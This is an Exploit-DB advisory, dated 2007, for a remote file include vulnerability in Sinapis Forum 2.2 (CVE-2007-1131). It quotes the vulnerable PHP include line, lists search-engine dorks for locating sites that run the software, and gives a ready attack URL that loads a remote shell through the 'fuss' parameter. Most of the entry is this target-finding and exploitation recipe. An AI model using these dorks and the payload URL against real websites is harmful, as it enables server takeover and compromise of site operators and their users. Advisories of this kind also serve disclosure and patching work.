Sinapis Forum 2.2 sinapis.php fuss Remote File Include Vulnerability

2007-02-23T00:00:00
ID EDB-ID:3367
Type exploitdb
Reporter kezzap66345
Modified 2007-02-23T00:00:00

Description

Sinapis Forum 2.2 (sinapis.php fuss) Remote File Include Vulnerability. CVE-2007-1131. Webapps exploit for php platform

                                        
                                            Sinapis Forum 2.2

*****************
Found by kezzap66345 *
*****************
Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=forum&title=Sinapis%20ForumGästebuch%20<img%20src=/pics/gbscr.gif>
*****************
Dork="Sinapis by scripter.ch"
Dork1="inurl:sinapis.php"
*****************
ERROR:
if($fuss != ""){include($fuss);}      <<< rfi coded


**************************************************************************************
RFI:

http://SITE.com/path//sinapis.php?fuss=[SHELL]

# milw0rm.com [2007-02-23]